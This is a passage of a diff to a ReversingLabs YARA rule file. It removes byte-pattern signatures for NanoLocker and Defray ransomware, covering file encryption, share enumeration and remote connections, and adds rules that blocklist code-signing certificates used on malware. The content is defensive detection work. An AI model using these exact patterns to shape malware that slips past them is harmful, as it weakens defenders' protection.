-            85 ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85
-            ?? ?? ?? ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 45 ?? BA ?? ?? ?? ?? E8 ?? ?? ?? ?? C3
-        }
+	condition:
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "FLY BETTER s.r.o." and pe.signatures [ i ] . serial == "24:e4:a2:b3:db:6b:e1:00:7b:9d:dc:91:99:5b:c0:c8" and 1645142400 <= pe.signatures [ i ] . not_after )
+}
+
+rule REVERSINGLABS_Cert_Blocklist_881573Fc67Ff7395Dde5Bccfbce5B088 : INFO FILE
+{
+	meta:
+		description = "Certificate used for digitally signing malware."
+		author = "ReversingLabs"
+		id = "d188c65c-ee7b-586f-95f0-8de5b506c325"
+		date = "2023-11-08"
+		modified = "2023-11-08"
+		reference = "ReversingLabs"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11180-L11198"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "ce489a4a2f07181d6fbf295f426deeaf51310e061bac2e56d65b37eeb397ff9a"
+		score = 75
+		quality = 90
+		tags = "INFO, FILE"
+		status = "RELEASED"
+		sharing = "TLP:WHITE"
+		category = "INFO"
+		importance = 25
 
 	condition:
-		uint16( 0 ) == 0x5A4D and $find_files_and_encrypt and $remote_connection_1 and $remote_connection_2
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Trade in Brasil s.r.o." and ( pe.signatures [ i ] . serial == "00:88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" or pe.signatures [ i ] . serial == "88:15:73:fc:67:ff:73:95:dd:e5:bc:cf:bc:e5:b0:88" ) and 1620000000 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Nanolocker : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_53E1F226Cb77574F8Fbeb5682Da091Bb : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects NanoLocker ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "a31dad2e-2738-527b-a6e9-322757e2ec30"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "fe3abe27-c8c8-54b8-b031-0546c9bfda90"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.NanoLocker.yara#L1-L79"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "7fdb021f22d97bf8a00fd856ef913695a0d6fbaad1138b5a5cc2cc8768b130be"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11200-L11216"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "591846225d5faf3ee8f3102acaad066f0187219044077bbdaf32345613b00965"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "NanoLocker"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$encrypt_file_1 = {
-            68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6 05 ?? ?? ?? ?? ?? 68
-            ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? C6
-            05 ?? ?? ?? ?? ?? 8D 3D ?? ?? ?? ?? 33 C9 C6 07 ?? 47 41 81 F9 ?? ?? ?? ?? 75 ?? C7
-            05 ?? ?? ?? ?? ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A
-            ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A
-            ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ??
-            ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 0B C0 0F 84 ?? ?? ?? ?? 81 3D
-            ?? ?? ?? ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 81 C6 ?? ?? ?? ?? 56 E8
-            ?? ?? ?? ?? 3D ?? ?? ?? ?? 0F 83 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 56 68 ?? ?? ?? ??
-            E8 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 03 F0 46 8A 06 3C ?? 0F 85 ?? ?? ?? ??
-            6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8
-        }
-		$encrypt_file_2 = {
-            A3 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? A3 ?? ?? ?? ?? 83 3D ?? ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? 81 3D ?? ?? ?? ??
-            ?? ?? ?? ?? 0F 86 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ??
-            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ??
-            ?? ?? ?? 2D ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ?? E8 ?? ?? ?? ?? A3 ??
-            ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ??
-            6A ?? 6A ?? 6A ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? C7 05 ?? ?? ?? ?? ?? ??
-            ?? ?? FF 35 ?? ?? ?? ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ??
-            ?? ?? ?? E8
-        }
-		$remote_server_1 = {
-            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? A1 ?? ??
-            ?? ?? 83 F8 ?? 72 ?? C6 05 ?? ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ??
-            ?? 6A ?? 6A ?? 68 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF
-            35 ?? ?? ?? ?? E8
-        }
-		$remote_server_2 = {
-            E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? FF 35 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? A3 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 68 ?? ?? ?? ?? 6A ?? FF 35 ?? ?? ?? ?? 68 ??
-            ?? ?? ?? FF 35 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
-        }
-		$enum_shares_and_encrypt_files = {
-            E8 ?? ?? ?? ?? C1 C8 ?? BA ?? ?? ?? ?? 23 D0 60 83 FA ?? 75 ?? 68 ?? ?? ?? ?? E8 ??
-            ?? ?? ?? 83 F8 ?? 76 ?? 83 F8 ?? 74 ?? 8D 35 ?? ?? ?? ?? 60 68 ?? ?? ?? ?? 56 68 ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 61 8A 06 46 0A C0 75 ?? 8A 06 0A C0 75 ?? 61 D1 C8 8A 1D ??
-            ?? ?? ?? FE C3 88 1D ?? ?? ?? ?? 80 FB ?? 76 ?? 6A ?? 6A ?? 6A ?? 6A ?? 6A ?? 68 ??
-            ?? ?? ?? 68 ?? ?? ?? ?? E8 ?? ?? ?? ?? A3 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? FF 35 ?? ??
-            ?? ?? E8 ?? ?? ?? ?? C6 05 ?? ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ?? 6A ?? 68 ?? ?? ?? ??
-            FF 35 ?? ?? ?? ?? E8 ?? ?? ?? ?? FF 35 ?? ?? ?? ?? E8
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and $encrypt_file_1 and $encrypt_file_2 and $remote_server_1 and $remote_server_2 and $enum_shares_and_encrypt_files
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "OdyLab Inc" and pe.signatures [ i ] . serial == "53:e1:f2:26:cb:77:57:4f:8f:be:b5:68:2d:a0:91:bb" and 1654020559 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Defray : TC_DETECTION MALICIOUS MALWARE FILE
+
+rule REVERSINGLABS_Cert_Blocklist_0772B4D1D63233D2B8771997Bc8Da5C4 : INFO FILE
 {
 	meta:
-		description = "Yara rule that detects Defray ransomware."
+		description = "Certificate used for digitally signing malware."
 		author = "ReversingLabs"
-		id = "bc9e2dfe-168b-5b99-8523-07bfdcba44f2"
-		date = "2020-07-15"
-		modified = "2020-07-15"
+		id = "fe602ac3-fa34-5056-a2cc-5ae9de728559"
+		date = "2023-11-08"
+		modified = "2023-11-08"
 		reference = "ReversingLabs"
-		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/yara/ransomware/Win32.Ransomware.Defray.yara#L1-L157"
-		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/d8f40bbab4baaa32894019b43236afe5d9109140/LICENSE"
-		logic_hash = "82d883c77f49e50edbc7af05a108d4d54a46dca7661e4d0cd8aeffa19cb8df98"
+		source_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/yara/certificate/blocklist.yara#L11218-L11234"
+		license_url = "https://github.com/reversinglabs/reversinglabs-yara-rules//blob/e3267cfb8a5a81fad12e7e7e3112ac574086046a/LICENSE"
+		logic_hash = "30586a643b29f3c943b3f35bb1639c5b9fa48ecbd776775086e35af502aa4a7a"
 		score = 75
 		quality = 90
-		tags = "TC_DETECTION, MALICIOUS, MALWARE, FILE"
+		tags = "INFO, FILE"
 		status = "RELEASED"
 		sharing = "TLP:WHITE"
-		category = "MALWARE"
-		tc_detection_type = "Ransomware"
-		tc_detection_name = "Defray"
-		tc_detection_factor = 5
+		category = "INFO"
 		importance = 25
 
-	strings:
-		$find_files = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 68 ?? ?? ?? ?? 33
-            F6 89 95 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 8B D9 56 50 89 9D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            83 C4 ?? 8D 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? 56 50 E8 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 83
-            C4 ?? 2B D3 8B CB 89 95 ?? ?? ?? ?? 0F B7 01 66 89 04 0A 8D 49 ?? 66 85 C0 75 ?? 8D
-            BD ?? ?? ?? ?? 83 EF ?? 66 8B 47 ?? 83 C7 ?? 66 3B C6 75 ?? BE ?? ?? ?? ?? 68 ?? ??
-            ?? ?? 53 A5 A5 66 A5 FF 15 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 85 ?? ?? ?? ?? 50 FF
-            15 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 83 F8 ?? 0F 84 ?? ?? ?? ?? 33 F6 8B 1D ?? ?? ?? ??
-            83 FB ?? 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B 10 66 3B 11 75 ??
-            66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66 85 D2 75 ?? 8B C6
-            EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? B9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 66 8B
-            10 66 3B 11 75 ?? 66 85 D2 74 ?? 66 8B 50 ?? 66 3B 51 ?? 75 ?? 83 C0 ?? 83 C1 ?? 66
-            85 D2 75 ?? 8B C6 EB ?? 1B C0 83 C8 ?? 85 C0 0F 84 ?? ?? ?? ?? 8B 8D ?? ?? ?? ?? 8B
-            95 ?? ?? ?? ?? 0F B7 01 66 89 04 0A 8D 49 ?? 66 85 C0 75 ?? 8D BD ?? ?? ?? ?? 83 EF
-            ?? 33 C9 66 8B 47 ?? 8D 7F ?? 66 3B C1 75 ?? A1 ?? ?? ?? ?? 8D 95 ?? ?? ?? ?? 89 07
-            8B F2 66 8B 02 83 C2 ?? 66 3B C1 75 ?? 8D BD ?? ?? ?? ?? 2B D6 83 EF ?? 66 8B 47 ??
-            83 C7 ?? 66 3B C1 75 ?? 8B CA C1 E9 ?? F3 A5 8B CA 83 E1 ?? F6 85 ?? ?? ?? ?? ?? F3
-            A4 74 ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? EB ?? F7 85 ?? ?? ?? ??
-            ?? ?? ?? ?? 75 ?? 8B 8D ?? ?? ?? ?? 66 8B 85 ?? ?? ?? ?? 66 89 04 59 43 89 1D ?? ??
-            ?? ?? 33 F6 8B 9D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 53 FF 15 ?? ?? ?? ?? 85 C0 0F 85
-            ?? ?? ?? ?? 53 FF 15 ?? ?? ?? ?? 8B 4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$find_special_folders = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 53 56 57 BE ?? ?? ?? ?? 8D
-            85 ?? ?? ?? ?? 56 33 DB 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 56 53 50 E8
-            ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 56 53 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ??
-            ?? ?? BE ?? ?? ?? ?? 8D BD ?? ?? ?? ?? 6A ?? 59 68 ?? ?? ?? ?? 53 F3 A5 50 E8 ?? ??
-            ?? ?? 83 C4 ?? 8D BD ?? ?? ?? ?? BE ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 6A ?? 59 F3 A5 68
-            ?? ?? ?? ?? 53 50 66 A5 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? BE ?? ?? ?? ?? 8D
-            BD ?? ?? ?? ?? 6A ?? 59 68 ?? ?? ?? ?? 53 F3 A5 50 E8 ?? ?? ?? ?? 8B 35 ?? ?? ?? ??
-            8D 85 ?? ?? ?? ?? 83 C4 ?? 53 6A ?? 50 53 FF D6 53 6A ?? 8D 85 ?? ?? ?? ?? 50 53 FF
-            D6 53 6A ?? 8D 85 ?? ?? ?? ?? 50 53 FF D6 8D BD ?? ?? ?? ?? 83 EF ?? 66 8B 47 ?? 83
-            C7 ?? 66 3B C3 75 ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? 83 EF ?? 66 8B
-            47 ?? 83 C7 ?? 66 3B C3 75 ?? 6A ?? 59 BE ?? ?? ?? ?? F3 A5 8D BD ?? ?? ?? ?? 83 EF
-            ?? 66 8B 47 ?? 83 C7 ?? 66 3B C3 75 ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? A5 A5 A5 A5
-            66 A5 E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D
-            8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 84 C0 74 ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B
-            4D ?? 5F 5E 33 CD 5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$remote_connection = {
-            55 8B EC 81 EC ?? ?? ?? ?? A1 ?? ?? ?? ?? 33 C5 89 45 ?? 8B 45 ?? 53 56 57 89 85 ??
-            ?? ?? ?? 33 DB 8B 45 ?? 8B FA 68 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 53
-            50 E8 ?? ?? ?? ?? A1 ?? ?? ?? ?? 83 C4 ?? 89 45 ?? A0 ?? ?? ?? ?? 88 45 ?? 8D 85 ??
-            ?? ?? ?? 53 53 53 53 50 FF 15 ?? ?? ?? ?? 8B 35 ?? ?? ?? ?? 8B D8 89 9D ?? ?? ?? ??
-            85 DB 74 ?? 33 C0 50 50 6A ?? 50 50 68 ?? ?? ?? ?? 57 53 FF 15 ?? ?? ?? ?? 8B F8 85
-            FF 74 ?? 33 C0 50 68 ?? ?? ?? ?? 50 50 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 45 ?? 50
-            57 FF 15 ?? ?? ?? ?? 8B D8 85 DB 74 ?? 8B 95 ?? ?? ?? ?? 33 C9 85 D2 74 ?? 8B CA 8D
-            41 ?? 89 85 ?? ?? ?? ?? 8A 01 41 84 C0 75 ?? 2B 8D ?? ?? ?? ?? 51 52 6A ?? 6A ?? 53
-            FF 15 ?? ?? ?? ?? 53 FF D6 8B 9D ?? ?? ?? ?? 57 FF D6 53 FF D6 8B 4D ?? 5F 5E 33 CD
-            5B E8 ?? ?? ?? ?? 8B E5 5D C3
-        }
-		$encrypt_files_1 = {
-            55 8B EC 51 51 83 4D ?? ?? 83 4D ?? ?? 57 6A ?? 68 ?? ?? ?? ?? 6A ?? 6A ?? 6A ?? 68
-            ?? ?? ?? ?? 51 FF 15 ?? ?? ?? ?? 8B F8 83 FF ?? 75 ?? 6A ?? 58 EB ?? 56 8D 45 ?? 50
-            57 FF 15 ?? ?? ?? ?? 89 45 ?? 85 C0 75 ?? 6A ?? EB ?? 8B 75 ?? 3B C6 0F 42 F0 83 7D
-            ?? ?? 74 ?? 6A ?? 8D 45 ?? 50 56 FF 75 ?? 57 FF 15 ?? ?? ?? ?? 85 C0 75 ?? 6A ?? 5E
-            57 FF 15 ?? ?? ?? ?? EB ?? 57 FF 15 ?? ?? ?? ?? 3B 75 ?? 6A ?? 58 0F 45 F0 8B C6 EB
-            ?? 57 FF 15 ?? ?? ?? ?? B8 ?? ?? ?? ?? 5E 5F 8B E5 5D C2
-        }
-		$encrypt_files_2_p1 = {
-            68 ?? ?? ?? ?? B8 ?? ?? ?? ?? E8 ?? ?? ?? ?? 89 8D ?? ?? ?? ?? 33 C0 89 85 ?? ?? ??
-            ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 45 ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ??
-            89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 89 85 ?? ?? ?? ?? 68 ?? ?? ?? ?? C6 45 ?? ?? 50 89 85 ?? ??
-            ?? ?? 89 85 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 6A ?? 59 33 C0 8D 7D ??
-            F3 AB 83 C4 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85 C0 74 ?? FF 15 ?? ?? ?? ?? 50
-            68 ?? ?? ?? ?? 83 CE ?? EB ?? 6A ?? 8D 55 ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 59 85
-            C0 74 ?? FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 5E 6A ?? 8B D6 59 E8 ?? ?? ?? ??
-            59 59 E9 ?? ?? ?? ?? 8B B5 ?? ?? ?? ?? 85 F6 75 ?? 6A ?? 5E E9 ?? ?? ?? ?? 80 BD ??
-            ?? ?? ?? ?? B8 ?? ?? ?? ?? 75 ?? B8 ?? ?? ?? ?? 3B F0 0F 47 F0 8D 85 ?? ?? ?? ?? 50
-            56 8B C8 89 B5 ?? ?? ?? ?? E8 ?? ?? ?? ?? 56 FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ??
-            ?? 8B F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8 ?? ?? ??
-            ?? 59 59 BE ?? ?? ?? ?? E9 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 85 C0 74 ??
-            FF 15 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 6A ?? 5A 6A ?? 59 E8 ?? ?? ?? ?? 59 59 6A ?? E9
-            ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 56 E8 ?? ?? ?? ?? 59 8D 55 ?? 8D 8D
-            ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B C7 8B DF 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 74 ?? 8B
-        }
-		$encrypt_files_2_p2 = {
-            B5 ?? ?? ?? ?? 43 46 8B C3 25 ?? ?? ?? ?? 79 ?? 48 83 C8 ?? 40 75 ?? 89 B5 ?? ?? ??
-            ?? 8D 85 ?? ?? ?? ?? 50 53 8B C8 E8 ?? ?? ?? ?? 33 D2 85 FF 7E ?? 8B 85 ?? ?? ?? ??
-            8A 0C 10 8B 85 ?? ?? ?? ?? 88 0C 10 42 3B D7 7C ?? 3B FB 7D ?? 8B C3 2B C7 50 8B 85
-            ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 03 C7 50 E8 ?? ?? ?? ?? 83 C4 ?? 8D 85 ?? ?? ?? ?? 50
-            53 8B C8 E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 68 ?? ?? ?? ?? 8B C8 E8 ?? ?? ?? ?? 8B
-            95 ?? ?? ?? ?? 8D 45 ?? 51 50 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 83 C4 ?? 85 C0 74
-            ?? 6A ?? E9 ?? ?? ?? ?? 8B 95 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? 53 FF B5 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 59 59 85 C0 75 ?? 6A ?? 33 FF 5A 8B 85 ?? ?? ?? ?? 8A 4C 3D ?? 88 0C 38
-            47 3B FA 7C ?? 8D 75 ?? 6A ?? 2B F2 5F 8B 85 ?? ?? ?? ?? 8A 0C 32 88 0C 10 42 3B D7
-            7C ?? 51 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 8D 95 ?? ?? ?? ?? E8
-            ?? ?? ?? ?? 59 59 85 C0 74 ?? 6A ?? E9 ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 83 EC ?? 8D
-            85 ?? ?? ?? ?? 50 51 8B 8D ?? ?? ?? ?? 8D 85 ?? ?? ?? ?? 50 E8 ?? ?? ?? ?? 83 C4
-        }
-		$encrypt_files_2_p3 = {
-            85 C0 79 ?? 6A ?? E9 ?? ?? ?? ?? 8D B5 ?? ?? ?? ?? BA ?? ?? ?? ?? 2B F7 8B 85 ?? ??
-            ?? ?? 8A 0C 37 88 0C 38 47 3B FA 7C ?? 8B B5 ?? ?? ?? ?? A1 ?? ?? ?? ?? 8A 8C 02 ??
-            ?? ?? ?? 8B 85 ?? ?? ?? ?? 88 0C 10 42 81 FA ?? ?? ?? ?? 7C ?? 83 BD ?? ?? ?? ?? ??
-            74 ?? 8D 4D ?? E8 ?? ?? ?? ?? 84 C0 75 ?? BE ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ??
-            ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8B C6 E9 ?? ?? ?? ?? 51 6A ?? 53 FF B5 ?? ?? ?? ?? 8D 4D ?? E8
-            ?? ?? ?? ?? 8B F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8
-            ?? ?? ?? ?? 59 59 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ??
-            8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 87 ?? ?? ?? ??
-            E9 ?? ?? ?? ?? 51 6A ?? 68 ?? ?? ?? ?? FF B5 ?? ?? ?? ?? 8D 4D ?? E8 ?? ?? ?? ?? 8B
-            F8 85 FF 79 ?? FF 15 ?? ?? ?? ?? 50 8D 45 ?? 50 6A ?? 5A 6A ?? 59 E8 ?? ?? ?? ?? 59
-            59 EB ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ??
-            ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8B 85 ?? ?? ?? ?? 01 34 85
-            ?? ?? ?? ?? FF 04 85 ?? ?? ?? ?? 33 FF 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ??
-            ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ?? ?? 8D 8D ?? ?? ?? ?? E8 ?? ?? ??
-            ?? 8B C7 E8 ?? ?? ?? ?? C3
-        }
-
 	condition:
-		uint16( 0 ) == 0x5A4D and ( $find_files ) and ( $find_special_folders ) and ( $encrypt_files_1 ) and ( all of ( $encrypt_files_2_p* ) ) and ( $remote_connection )
+		uint16( 0 ) == 0x5A4D and for any i in ( 0 .. pe.number_of_signatures ) : ( pe.signatures [ i ] . subject contains "Maya logistika d.o.o." and pe.signatures [ i ] . serial == "07:72:b4:d1:d6:32:33:d2:b8:77:19:97:bc:8d:a5:c4" and 1637971201 <= pe.signatures [ i ] . not_after )
 }
-rule REVERSINGLABS_Win32_Ransomware_Garrantydecrypt : TC_DETECTION MALICIOUS MALWARE FILE
+
